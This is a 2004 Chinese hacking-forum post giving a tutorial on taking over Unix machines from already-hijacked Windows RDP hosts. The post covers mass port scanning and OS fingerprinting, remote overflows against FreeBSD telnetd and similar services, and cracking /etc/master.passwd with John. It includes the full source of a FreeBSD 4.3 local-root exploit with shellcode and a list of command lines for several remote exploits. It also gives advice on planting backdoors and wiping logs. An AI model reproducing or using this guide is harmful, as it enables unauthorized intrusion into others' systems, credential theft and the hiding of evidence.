- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0
我的地盘我做主
该用户从未签到
 |
今天的话题是怎么样找unix肉鸡,我想这对于一个有很多windows肉鸡而没有unix肉鸡的人是很有必要。
, c# Y; T1 v2 B1 H不罗嗦,直入正题。为什么说是我和x-laser一起找肉鸡呢?因为我们的一切操作全部是在3389肉鸡上进行的。首先我们都上到同一个终端,(前提:终端是对方开的,而不是你自己做的,这样才有终端服务管理器可用)然后用管理工具中的终端管理进行id切换(选择用户进行连接)% M: l0 N$ u7 J1 {% L7 B; ~/ `
! G3 S; ?! w0 P
这样,两个人就可以互相控制对方了,一举一动都很清楚,这种方法很好,大大提高了效率,也增加了入侵时的乐趣。建议大家推广 :)
4 u2 @( G) h9 r2 P# L9 g 下面我们开始工作。由于是在win上搞unix类,所以我们最好要有在win上用的exploit,以得到第一台unix肉鸡。关于在win上用的exploits可以用cygwin编译(在www.isfocus.com)有下载。或者直接去大鹰的主页(e4gle.org)或者红客技术联盟(www.cnhonker.net/old.php)下载,注意了,要一起下那个cygwin1.dll的文件,不然搞不成。
+ z8 c8 K% l j+ t6 j现在我们要做的是找出大量unix的肉鸡,然后再去找漏洞,但是怎么找呢?这时候,就请出了我们的languard network scanner,在做了简单的设置让他跑的快点后,我们就开始扫描; X$ }* h, a1 S. w! F3 Y4 v
5 F4 G1 P9 R4 F* i( _5 K1 [* |9 g F H: Z$ K- L; ^* w; G
我们看到有一台freebsd,这个系统比较好欺负,因为前段时间有个沸沸扬扬的telnetd远程溢出漏洞。当然我们也可以用superscan来快速判断操作系统.我们用superscan扫23端口,因为telnet上去一般都有banner,从而得知操作系统类型.如下6 b( I* y6 @* Y# V5 D
4 Z3 p0 I5 V' _7 t
我们扫到了两台linux,….. ..#..’是linux的判断符." g7 F9 P U1 h7 ~3 q% t
……..#..’..$则是sunos的判断符,如此等等,大家用用就有经验了.0 S& U9 a& v2 z
6 k% d: c" l2 E' c2 }& ^; p0 I) ]2 Z& g" \6 ] i
言归正转,来看我们的freebsd.我们在红盟下好bsd.exe和cygwin1.dll后,就开始溢出了。+ e9 O2 s9 t+ Q( f2 i5 q# R# B6 o
0 R$ b, e1 p6 x9 y. c8 Y
由于要发送16M的东西,所以可能会慢点' L3 U( z# W" v# m
等到成功后,会出现 command ?
& P: p$ L; M9 @( {/ u# ]& O* L这是输入 id
* o1 D: j" S9 B+ N可以看到自己已经成为root了。当然,大家还可以把shadow抓下来,bsd下的sh& X1 \1 B5 y9 q$ L* S, N
adow文件是/etc/master.passwd,然后john跑个用户名出来(在www.xfocus.net有john的windows下的版本下载,也是用cygwin编译的),再telnet上去,就得到了普通帐号(因为root帐号一般比较难破),再进行本地溢出。为什么要这么麻烦呢?因为我们远程得到的shell很多都没有回显,所以不方便添加帐号。一般在bsd下添加帐号是在/usr/sbin下执行./adduser ,然后按着提示做就可以了,bsd系统很稳定,很多大型网站都是用这个建站,比如红盟。本地溢出的代码我在这里贴一下0 P0 W. X1 ?1 g5 B$ M5 q
+ T% C- J$ U/ I1 j& g$ t" q. {
?受影响版本: FreeBSD 4.3 4.2 4.1 4.0
1 Q5 u+ C3 y) _5 a, @1 m# r早期版本也许受影响 测试程序使用方法: </P>. N3 D! t, G$ j
netdemon%gcc -o vvbsd vvbsd.c netdemon%cp /bin/sh /tmp netdemon%./vvbsd vvfreebsd. Written by Georgi Guninski shall jump to bfbffe71 child=61056 login: login: # done # </P> Y* @, J8 }9 V9 {1 z2 ? i
发现 FreeBSD 4.3 存在一个设计上的漏洞,它允许用户在其它进程中插入 signal handlers。 </P>, `* B: y' V. q V5 |2 q
题出在 rfork(RFPROC|RFSIGSHARE) ,如果子进程 exec() 一个 setuid 程序,然后父进程设置一个 signal handlers,这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。 利用此漏洞,本地攻击者能取得 root 权限。 vvfreebsd.c / W9 L5 G7 S# I3 h, Z( e+ H
% G* \, \8 S) t$ q ???? /* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski http://www.guninski.com */ #include <stdio.h> #include <signal.h> #include <unistd.h> int vv1; #define MYSIG SIGINT //exec "/tm* I8 Z1 P9 q1 J& c5 v
p/sh", shellcode gotten from the internet and modified unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x50\xb0\xb7\xcd\x80" "\x31\xc0\x50\x50\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80\x90\x90\x90"; typedef (*PROG)(); extern char **environ; int main(int ac,char **av) { int pid; //(*(PROG)bsdshell)(); if(!(vv1=getenv("vv"))) { setenv("vv",bsdshell,1); if(!execle(av[0],"vv",NULL,environ)) { perror("weird exec"); exit(1); } } printf("vvfreebsd. Written by Georgi Guninski\n"); printf("shall jump to %x\n",vv1); if(!(pid=rfork(RFPROC|RFSIGSHARE))) { printf("child=%d\n",getpid()); // /usr/bin/login and rlogin work for me. ping gives nonsuid shell // if(!execl("/usr/bin/rlogin","rlogin","localhost",0)) if(!execl("/usr/bin/login","login",0)) { perror("exec setuid failed"); exit(2); }; } sleep(2); signal(MYSIG,(sig_t)vv1); sleep(2); kill(pid,MYSIG); printf("done\n"
" s7 v5 N2 o2 \2 h3 _* s# w* e); while(42); } </P>; L# j+ w0 y3 j# t# W
/* www.xcode.tw.st 极端网络安全小组 */ N6 S6 t: I0 x) z6 T7 B9 K1 A" u% {2 L" _
! q, _9 ?) z Z9 J2 |; ?
) k- \1 d4 a/ P3 @, B* s- h: _& F
可以找到可写的地方,然后cat >vv.c 回车! k2 v. G0 n9 e+ B- `1 x4 ]) x0 G
(鼠标右健粘贴)
' S, t+ v* X5 Y% r+ kctrl + d保存
% a8 d' v7 n+ _& i$gcc –o vv vv.c编译(gcc在solaris和aix等系统下叫做cc)
1 D) L& Q6 f! I$cp /bin/csh /tmp
5 t( M) ^4 j |, r2 r$./vv! J/ q% S7 `: v# C$ k' F7 x. t
这样就执行了,一般可以得到root.注意第二句,这是代码的需要
7 Y+ k, c! L3 P7 f然后就去adduser然后再放一堆后门上去吧 c; ]2 R3 H o1 Q9 c9 X
几点补充:1.命令w查看当前哪些在线,要是看见root就要小心了 n! O6 D$ O4 B2 E' o& R! c# q* s
2
% ?' B+ u6 H. B/ z1 A.Whereis gcc查看装了gcc没有,whereis的用法很灵活7 A/ l- W: k4 W4 |5 Y {
3如果没装就需要把编译好的传上去,我们一般是申请一个ftp,然后编译好,传到ftp上,在让攻击的机子去下载(51.net的虚拟主机就可以完成这项任务)
9 r( Q% q+ a" h/ a* ^. g7 A, W' d, S w4记得每次上去要用wipe清理足迹,wipe在小凤居有下载 r$ B! E7 F4 [2 M7 a! j
</P>) G; T! f! _* O
另外再附几种常见的exploit的用法. u5 V% N4 o6 t) @2 v9 i* D7 c& h
0 f9 @! Q: L5 q C: Q1 ]7 J: b( Q5 `
目标主机一律用128.0.0.1代替! 1 statdu[vdp]redhat6.xrpc status远程溢出! </P>9 e5 x% z& L# [3 {' d; t) |
溢出程序: statdx 用法: </P>
0 Q1 |0 z: e8 x3 Z. B* v./statdx -d 0 128.0.0.1或者 </P>2 F5 h2 }" S+ R& ^6 \& M# ^
./statdx -d 1 128.0.0.1或者 </P>
5 b h, \( O; J3 k./statdx -d 2 128.0.0.1 </P>
7 ?2 C$ D4 q) f3 ^9 {3 u! F) x& a2 sadmind[vdp]sun solaris sparc 2.6.2.7远程溢出 </P># z7 o+ ]+ W6 S, U
溢出程序: sadmindxbrute 用法 </P>& d$ k2 [5 k% @- C
./sadmindxbrute (主机类型参数) 128.0.0.1 主机参数 1 x86 2.6 2 x86 7.0 3 sparc 2.6 4 sparc 7.0 3 ttdb[tcp]sun solaris 2.3 2.4 2.5 2.5.12.6远程溢出 </P>8 A) `2 e B1 D, x( G( H _! a
所用程序 ttds(已经改名)流光iv的exploit内可以找到 </P>
3 }6 Q$ |" H9 C9 ~$ K/ O2 ^) T. a用法: ./ttds 128.0.0.1 80(攻击断口设置为80)-v6 4 snmp[bdp]sun solaris sparc 7.0/8.8远程溢出 </P>: j F+ Z" E( Z5 O' r; m
所用程序 snmpxmid </P>+ _2 F1 V* w; `/ _' B# a& E) @& _
用法: ./snmpxmid 128.0.0.1 -v 7 5 bind 远程溢出 </P>
" G, v. N3 W& l7 E5 {3 |程序bind </P>
6 t7 O8 ~. w8 Z/ B" h4 z) A: t用法: ./bind 128.0.0.1 -e 6 irix的telnet远程溢出(这个可能用流光iv扫描不到) </P>0 I$ X6 b$ {5 k9 O2 Z
所用程序telnetd </P>
- S( j0 Y# ]% i+ p) ^用法: ./telnetd 128.0.0.1 7 utofsd[vdp]bsd autofsd远程溢出,tcp 530 root shell </P>9 D+ Z7 ^9 c0 i5 i1 {0 |. V
所用程序 utofsd </P>
. E0 a$ U7 Z% l/ s u5 V5 m用法: ./utofsd 128.0.0.1 8 freebsd远程溢出 </P>
& t& S/ ?) e. z& y' r& R这个可以通过www.paching.net/liumy写的bsd攻击程序在winnt下使用方法 bsd 128.0.0.1 其他的远程溢出程序也不麻烦 你只要把程序编译好之后输入 ./程序名 --h就可以看到帮助了!
( `5 b$ S: g9 H5 M! _2 I
- _0 o- V8 \. } 补充一点,很多写exploit的牛人为了让自己的exploit给真正的黑客用,故意在代码里放了几个错误,所以大家还是要学好编程的这样,就可以根据gcc编译器的错误提示把错误的代码改过来。今天我们讲了怎样找unix类肉鸡,当然还是要看运气,不过我和x-laser在3389肉鸡扫描很疯狂,用superscan一次一般是扫255个c段用languard也扫的很多,所以建议大家多多实践.最后,奉劝一句,不要入侵国内,不要搞破坏! </P> |
zan
|
IP卡
狗仔卡
发表于 2004-10-5 18:33
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
